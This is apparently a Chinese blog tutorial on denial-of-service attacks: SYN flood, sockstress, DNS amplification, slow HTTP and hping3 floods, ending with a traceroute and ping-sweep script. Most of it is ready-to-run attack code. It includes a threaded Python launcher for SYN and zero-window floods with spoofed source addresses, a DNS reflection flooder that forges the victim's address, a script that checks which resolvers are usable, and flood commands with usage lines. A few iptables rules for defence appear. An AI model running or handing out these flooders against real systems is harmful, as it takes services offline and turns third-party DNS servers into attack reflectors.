SynFlood 洪水攻擊
Syn-Flood攻擊屬於TCP攻擊,Flood類攻擊中最常見,危害最大的是Syn-Flood攻擊,也是歷史最悠久的攻擊之一,該攻擊屬於半開放攻擊,攻擊實現原理就是通過發送大量半連接狀態的數據包,從而耗盡目標系統的連接池,默認情況下每一種系統的並發連接都是有限制的,如果惡意攻擊持續進行,將會耗盡系統有限的連接池資源。windows 系統半開連接數是10個
攻擊者偽造地址對服務器發起SYN請求,服務器就會回應 SYN+ACK 此時攻擊者的主機拒絕發送 RST+ACK 那么,服務器接收不到RST請求,就會認為客戶端還沒有准備好,會重試3-5次並且等待一個SYN Time(一般30秒-2分鍾)后,丟棄這個連接。
雖然有丟棄的環節,但是如果攻擊者的攻擊速度大於目標主機的丟包速度的話,就會發生拒絕服務,因為TCP連接池一旦被填滿,那么真正的連接無法建立,無法響應正常請求。
可以使用scapy工具進行驗證,發送一個正常數據包,代碼如下,發生攻擊后再服務器上通過使用 netstat -n | awk '/^tcp/ {++S[$NF]} END{for(a in S) print a,S[a]}'
匹配所有半開放鏈接,你可以看都非常多等待狀態的連接得不到相應。
ip = IP()
ip.dst="192.168.1.10"
tcp=TCP()
sr1(ip/tcp,verbose=1,timeout=3)
sr1(IP(dst="192.168.1.10")/TCP())
攻擊代碼如下
#coding=utf-8
import socket, sys, random
from scapy.all import *
scapy.config.conf.iface = 'Realtek PCIe GBE Family Controller'
# windows 系統半開連接數是10個
# iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 192.168.1.10 -j DROP
# 匹配所有半開放鏈接 netstat -n | awk '/^tcp/ {++S[$NF]} END{for(a in S) print a,S[a]}'
# ip = IP()
# ip.dst="192.168.1.10"
# tcp=TCP()
# sr1(ip/tcp,verbose=1,timeout=3)
# sr1(IP(dst="192.168.1.10")/TCP())
target = "192.168.1.20"
dstport = 22
isrc = '%i.%i.%i.%i' % (random.randint(1,254),random.randint(1,254),random.randint(1,254), random.randint(1,254))
isrc = "192.168.1.2"
print(isrc,dstport)
isport = random.randint(1,65535)
ip = IP(src = isrc,dst = target)
syn = TCP(sport = isport, dport = dstport, flags = 'S')
send(ip / syn, verbose = 0)
Sock Stress 全連接攻擊
該攻擊方式屬於TCP全連接攻擊,因為需要建立一次完整的TCP三次握手,該攻擊的關鍵點就在於,攻擊主機將windows窗口緩沖設置為0,實現的拒絕服務。
攻擊者向目標發送一個很小的流量,但是會造成產生的攻擊流量是一個巨大的,該攻擊消耗的是目標系統的CPU/內存資源,使用低配版的電腦,依然可以讓龐大的服務器拒絕服務,也稱之為放大攻擊。
該攻擊與目標建立大量的socket連接,並且都是完整連接,最后的ACK包,將Windows大小設置為0,客戶端不接收數據,而服務器會認為客戶端緩沖區沒有准備好,從而一直等待下去(持續等待將使目標機器內存一直被占用),由於是異步攻擊,所以單機也可以拒絕高配的服務器。
#coding=utf-8
import socket, sys, random
from scapy.all import *
scapy.config.conf.iface = 'Realtek PCIe GBE Family Controller'
def sockstress(target,dstport):
xport = random.randint(0,65535)
response = sr1(IP(dst=target)/TCP(sport=xport,dport=dstport,flags="S"),timeout=1,verbose=0)
send(IP(dst=target)/ TCP(dport=dstport,sport=xport,window=0,flags="A",ack=(response[TCP].seq +1))/'\x00\x00',verbose=0)
sockstress("192.168.1.20",80)
除了自己編寫代碼實現以外還可以下載一個項目 https://github.com/defuse/sockstress 該項目是發現這個漏洞的作者編寫的利用工具,具體使用如下。
iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 被攻擊主機IP -j DROP
wget https://www.blib.cn/sh/sockstress.c
git clone https://github.com/defuse/sockstress
gcc -Wall -c sockstress.c
gcc -pthread -o sockstress sockstress.o
./sockstress 192.168.1.10:3306 eth0
./sockstress 192.168.1.10:80 eth0 -p payloads/http
直到今天sockstress攻擊仍然效果明顯,由於攻擊過程建立了完整的TCP三次握手,所以使用syn cookie防御無效,我們可以通過防火牆限制單位時間內每個IP建立的TCP連接數來阻止這種攻擊的蔓延。
[root@localhost ~]# iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --set
[root@localhost ~]# iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --seconds 30 --hitcount 10 -j DROP
但是該方法依然我發防御DDOS拒絕服務的攻擊,這種攻擊只能拼機器拼資源了。
最后將前面兩種攻擊手段封裝成一個,該代碼只能在Linux系統下使用。
#coding=utf-8
# iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 被害IP -j DROP
from optparse import OptionParser
import socket,sys,random,threading
from scapy.all import *
scapy.config.conf.iface = 'ens32'
# 攻擊目標主機的Window窗口,實現目標主機內存CPU等消耗殆盡
def sockstress(target,dstport):
semaphore.acquire() # 加鎖
isport = random.randint(0,65535)
response = sr1(IP(dst=target)/TCP(sport=isport,dport=dstport,flags="S"),timeout=1,verbose=0)
send(IP(dst=target)/ TCP(dport=dstport,sport=isport,window=0,flags="A",ack=(response[TCP].seq +1))/'\x00\x00',verbose=0)
print("[+] sendp --> {} {}".format(target,isport))
semaphore.release() # 釋放鎖
# 攻擊目標主機TCP/IP半開放連接數,windows系統半開連接數是10個
def synflood(target,dstport):
semaphore.acquire() # 加鎖
issrc = '%i.%i.%i.%i' % (random.randint(1,254),random.randint(1,254),random.randint(1,254), random.randint(1,254))
isport = random.randint(1,65535)
ip = IP(src = issrc,dst = target)
syn = TCP(sport = isport, dport = dstport, flags = 'S')
send(ip / syn, verbose = 0)
print("[+] sendp --> {} {}".format(target,isport))
semaphore.release() # 釋放鎖
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("-H","--host",dest="host",type="string",help="輸入被攻擊主機IP地址")
parser.add_option("-p","--port",dest="port",type="int",help="輸入被攻擊主機端口")
parser.add_option("--type",dest="types",type="string",help="指定攻擊的載荷 (synflood/sockstress)")
parser.add_option("-t","--thread",dest="thread",type="int",help="指定攻擊並發線程數")
(options,args) = parser.parse_args()
# 使用方式: main.py --type=synflood -H 192.168.1.1 -p 80 -t 10
if options.types == "synflood" and options.host and options.port and options.thread:
semaphore = threading.Semaphore(options.thread)
while True:
t = threading.Thread(target=synflood,args=(options.host,options.port))
t.start()
elif options.types == "sockstress" and options.host and options.port and options.thread:
semaphore = threading.Semaphore(options.thread)
while True:
t = threading.Thread(target=sockstress,args=(options.host,options.port))
t.start()
else:
parser.print_help()
使用syn flood 攻擊方式:python3 c.py --type=synflood -H 192.168.1.10 -p 3389 -t 100
使用sock並發攻擊: python3 c.py --type=sockstress -H 192.168.1.10 -p 80 -t 100
以太網數據包分段
備注:以下的兩張圖片來源於,安全牛課件,感覺不錯,我就不自己畫圖了,原理很簡單的東西。
數據包的最大傳輸單位是1500,如果超過這個大小數據包將會分片傳輸,分片傳輸則需要設置傳輸ID號,以及ip.frag_offset
偏移值,當設置了偏移值的時候,系統默認根據ID號為單位對數據包進行分段接收,收到全部包時在進行組合,並傳輸給系統識別。
傳輸第一個數據包時會跟隨有MAC頭,上層包頭等完整信息,傳輸后續包的時候默認只會保留IP頭與數據段,在IP頭保留 Fragment offset
說明這是一個分段傳輸。
下面以執行ping -l 5000 192.168.1.10
為例,向目標發送5000字節大小的數據包,5000/1480 = 3.37 也就會分四段進行傳輸。
如下圖,可以看出每次發送的數據都是,Total Length: 1500
,而Fragment offset
則指定每一個數據包的實際偏移值,ID則是數據包的分組號。
最后一個數據包將會把剩下的數據進行傳遞,並開始差錯校驗,組合成最終的數據。
DNS查詢放大攻擊
通過網絡中存在的DNS服務器資源,對目標主機發起的拒絕服務攻擊,其原理是偽造源地址為被攻擊目標的地址,向DNS遞歸服務器發起查詢請求,此時由於源IP是偽造的,固在DNS服務器回包的時候,會默認回給偽造的IP地址,從而使DNS服務成為了流量放大和攻擊的實施者,通過查詢大量的DNS服務器,從而實現反彈大量的查詢流量,導致目標主機查詢帶寬被塞滿,實現DDOS的目的。
此時我們使用scapy工具構建一個DNS請求數據包 sr1(IP(dst="8.8.8.8")/UDP()/DNS(rd=1,qd=DNSQR(qname="qq.com")),timeout=2)
查詢指定網站的DNS記錄,結果如下。
上圖可以看出,我們所發送的數據長度要小於接收到的數據長度,流量差不多被放大了3倍左右,我們只需要將源地址偽造為被害機器,並使用海量的DNS服務器作為僵屍主機發包,即可完成DDOS攻擊。
這里需要在網上找一些DNS服務器,我整理了一些: https://www.blib.cn/sh/dnslist.log
腳本驗證可用性
import socket,os,sys
from scapy.all import *
def Inspect_DNS_Usability(filename):
proxy_list = []
fp = open(filename,"r")
for i in fp.readlines():
try:
addr = i.replace("\n","")
respon = sr1(IP(dst=addr)/UDP()/DNS(rd=1,qd=DNSQR(qname="www.baidu.com")),timeout=2)
if respon != "":
proxy_list.append(str(respon["IP"].src))
except Exception:
pass
return proxy_list
proxy = Inspect_DNS_Usability("./dnslist.log")
fp = open("pass.log","w+")
for item in proxy:
fp.write(item + "\n")
fp.close()
驗證好有效性以后,接着就是Python多線程發包測試了,scapy構建數據包時由於DNS數據包比較特殊,構建是應該按照順序 IP/UDP/DNS
來構建,以下代碼可以完成發包測試
import socket,os,sys
from scapy.all import *
# 構造IP數據包
ip_pack = IP()
ip_pack.src = "192.168.1.2"
ip_pack.dst = "8.8.8.8"
# 構造UDP數據包
udp_pack = UDP()
udp_pack.sport = 53
udp_pack.dport = 53
# 構建DNS數據包
dns_pack = DNS()
dns_pack.rd = 1
dns_pack.qdcount = 1
# 構建DNSQR解析
dnsqr_pack = DNSQR()
dnsqr_pack.qname = "baidu.com"
dnsqr_pack.qtype = 255
dns_pack.qd = dnsqr_pack
respon = (ip_pack/udp_pack/dns_pack)
sr1(respon)
最后的代碼如下。
import os,sys,threading,time
from scapy.all import *
from optparse import OptionParser
def Inspect_DNS_Usability(filename):
proxy_list = []
fp = open(filename,"r")
for i in fp.readlines():
try:
addr = i.replace("\n","")
respon = sr1(IP(dst=addr)/UDP()/DNS(rd=1,qd=DNSQR(qname="www.baidu.com")),timeout=2)
if respon != "":
proxy_list.append(str(respon["IP"].src))
except Exception:
pass
return proxy_list
def DNS_Flood(target,dns):
# 構造IP數據包
ip_pack = IP()
ip_pack.src = target
ip_pack.dst = dns
# ip_pack.src = "192.168.1.2"
# ip_pack.dst = "8.8.8.8"
# 構造UDP數據包
udp_pack = UDP()
udp_pack.sport = 53
udp_pack.dport = 53
# 構造DNS數據包
dns_pack = DNS()
dns_pack.rd = 1
dns_pack.qdcount = 1
# 構造DNSQR解析
dnsqr_pack = DNSQR()
dnsqr_pack.qname = "baidu.com"
dnsqr_pack.qtype = 255
dns_pack.qd = dnsqr_pack
respon = (ip_pack/udp_pack/dns_pack)
sr1(respon)
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("--mode",dest="mode",help="選擇執行命令<check=檢查DNS可用性/flood=攻擊>")
parser.add_option("-f","--file",dest="file",help="指定一個DNS字典,里面存儲DNSIP地址")
parser.add_option("-t",dest="target",help="輸入需要攻擊的IP地址")
(options,args) = parser.parse_args()
# 使用方式: main.py --mode=check -f xxx.log
if options.mode == "check" and options.file:
proxy = Inspect_DNS_Usability(options.file)
fp = open("pass.log","w+")
for item in proxy:
fp.write(item + "\n")
fp.close()
print("[+] DNS地址檢查完畢,當前可用DNS保存為 pass.log")
# 使用方式: main.py --mode=flood -f xxx.log -t 192.168.1.1
elif options.mode == "flood" and options.target and options.file:
with open(options.file,"r") as fp:
countent = [line.rstrip("\n") for line in fp]
while True:
randomDNS = str(random.sample(countent,1)[0])
print("[+] 目標主機: {} -----> 隨機DNS: {}".format(options.target,randomDNS))
t = threading.Thread(target=DNS_Flood,args=(options.target,randomDNS,))
t.start()
else:
parser.print_help()
應用層DOS慢速攻擊
slowhttptest: 該攻擊是一款慢速攻擊工具,其擅長攻擊Apache/Tomcat這里應用層服務,通常情況下,http協議在接收到完整的客戶端請求數據包時才會開始處理本次請求,但如果攻擊者通過修改數據包中的Window窗口大小,實現慢速發送數據包,那么服務器就會始終為其保留連接池資源占用,此類大量的並發請求將會導致目標應用服務的連接池爆滿,從而無法相應正常用的請求。
1.下載並安裝
lyshark@Dell:~$ git clone https://github.com/shekyan/slowhttptest.git
lyshark@Dell:~$ ./configure
lyshark@Dell:~$ make && make install
lyshark@Dell:~$ slowhttptest --help
-g 在測試完成后,以時間戳為名生成一個CVS和HTML文件的統計數據
-H SlowLoris模式
-B Slow POST模式
-R Range Header模式
-X Slow Read模式
-c number of connections 測試時建立的連接數
-d HTTP proxy host:port 為所有連接指定代理
-e HTTP proxy host:port 為探測連接指定代理
-i seconds 在slowrois和Slow POST模式中,指定發送數據間的間隔。
-l seconds 測試維持時間
-n seconds 在Slow Read模式下,指定每次操作的時間間隔。
-o file name 使用-g參數時,可以使用此參數指定輸出文件名
-p seconds 指定等待時間來確認DoS攻擊已經成功
-r connections per second 每秒連接個數
-s bytes 聲明Content-Length header的值
-t HTTP verb 在請求時使用什么操作,默認GET
-u URL 指定目標url
-v level 日志等級(詳細度)
-w bytes slow read模式中指定tcp窗口范圍下限
-x bytes 在slowloris and Slow POST tests模式中,指定發送的最大數據長度
-y bytes slow read模式中指定tcp窗口范圍上限
-z bytes 在每次的read()中,從buffer中讀取數據量
2.使用方式.
slowloris模式:耗盡應用的並發連接池,類似於HTTP層的syn flood 洪水攻擊
slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://www.xxx.com/index.html -x 24 -p 3
slow post模式:耗盡應用的並發連接池,類似於HTTP層的syn flood 洪水攻擊
slowhttptest -c 3000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u https://www.xxx.com/index.html -x 10 -p 3
slow read模式:攻擊者通過調整TCP Window窗口大小,使服務器慢速返回數據
slowhttptest -c 8000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u https://www.xxx.com/index.html -p 3
Hping3: 工具的使用,該工具靈活性極高,常用於定制發送TCP/IP數據包,例如定制SYN Flood攻擊包,ICMP/UDP等攻擊
# 進行Syn Flood攻擊, -c=攻擊次數/ -d=數據包大小/ -S=Syn/ -p=端口 / -w = window窗口大小 / --flood=洪水攻擊 --rand-source=隨機源地址
hping3 - c 2000 -d 100 -S -w 64 -p 80 --flood --rand-source 192.168.1.10
hping3 -S -P -U -p 80 --flood --rand-source 192.168.1.10
# 進行TCP Flood攻擊,
hping3 -SARFUP -p 80 --flood --rand-source 192.168.1.10
# 進行UDP flood 攻擊
hping3 -a 192.168.1.10 --udp -s 53 -d 100 -p 53 --flood 192.168.1.10
# 進行ICMP攻擊
hping3 -q -n -a 192.168.1.10 --icmp -d 56 --flood 192.168.1.10
# 特殊TCP攻擊:源地址目標地址都是受害者,受害者自己完成三次握手
hping3 -n -a 192.168.1.10 -S -d 100 -p 80 --flood 192.168.1.10
tracert TTL值(拓展)
tracert 命令,跟蹤路由原理是IP路由每經過一個路由節點TTL值會減一,假設TTL值=0時數據包還沒有到達目標主機,那么該路由則會回復給目標主機一個數據包不可達,由此我們就可以獲取到目標主機的IP地址,如下通過scapy構造一個TTL為1的數據包,發送出去。
>>> from random import randint
>>> RandomID=randint(1,65534)
>>> packet = IP(dst="61.135.169.125", ttl=1, id=RandomID) / ICMP(id=RandomID, seq=RandomID) / "hello"
>>> respon = sr1(packet,timeout=3,verbose=0)
>>>
>>> respon
<IP version=4 ihl=5 tos=0xc0 len=61 id=14866 flags= frag=0 ttl=64 proto=icmp chksum=0xbc9a src=192.168.1.1 dst=192.168.1.2 |<ICMP type=time-exceeded code=ttl-zero-during-transit chksum=0xf4ff reserved=0 length=0 unused=None |<IPerror version=4 ihl=5 tos=0x0 len=33 id=49588 flags= frag=0 ttl=1 proto=icmp chksum=0x4f79 src=192.168.1.2 dst=61.135.169.125 |<ICMPerror type=echo-request code=0 chksum=0x30c4 id=0xc1b4 seq=0xc1b4 |<Raw load='hello' |>>>>>
一開始發送一個TTL為1的包,這樣到達第一個路由器的時候就已經超時了,第一個路由器就發ICMP通知說包超時,這樣就能夠記錄下所經過的第一個路由器的IP。然后將TTL加1,安全通過第一個路由器,而第二個路由器的的處理與第一個同樣,丟包,發通知說包超時了,這樣記錄下第二個路 由器IP,由此能夠一直進行下去,直到這個數據包到達目標主機,由此打印出全部經過的路由器。
將這個過程自動化,就可以完成數據包的跟蹤,Python 代碼如下所示
from scapy.all import *
from random import randint
import time,ipaddress,threading
from optparse import OptionParser
def ICMP_Ping(addr):
RandomID=randint(1,65534)
packet = IP(dst=addr, ttl=64, id=RandomID) / ICMP(id=RandomID, seq=RandomID) / "lyshark"
respon = sr1(packet,timeout=3,verbose=0)
if respon:
print("[+] --> {}".format(str(respon[IP].src)))
def TraceRouteTTL(addr):
for item in range(1,128):
RandomID=randint(1,65534)
packet = IP(dst=addr, ttl=item, id=RandomID) / ICMP(id=RandomID, seq=RandomID)
respon = sr1(packet,timeout=3,verbose=0)
if respon != None:
ip_src = str(respon[IP].src)
if ip_src != addr:
print("[+] --> {}".format(str(respon[IP].src)))
else:
print("[+] --> {}".format(str(respon[IP].src)))
return 1
else:
print("[-] --> TimeOut")
time.sleep(1)
if __name__== "__main__":
parser = OptionParser()
parser.add_option("--mode",dest="mode",help="選擇使用的工具模式<ping/trace>")
parser.add_option("-a","--addr",dest="addr",help="指定一個IP地址或范圍")
(options,args) = parser.parse_args()
# 使用方式: main.py --mode=ping -a 192.168.1.0/24
if options.mode == "ping":
net = ipaddress.ip_network(str(options.addr))
for item in net:
t = threading.Thread(target=ICMP_Ping,args=(str(item),))
t.start()
# 使用方式: main.py --mode=trace -a 61.135.169.121
elif options.mode == "trace":
TraceRouteTTL(str(options.addr))
else:
parser.print_help()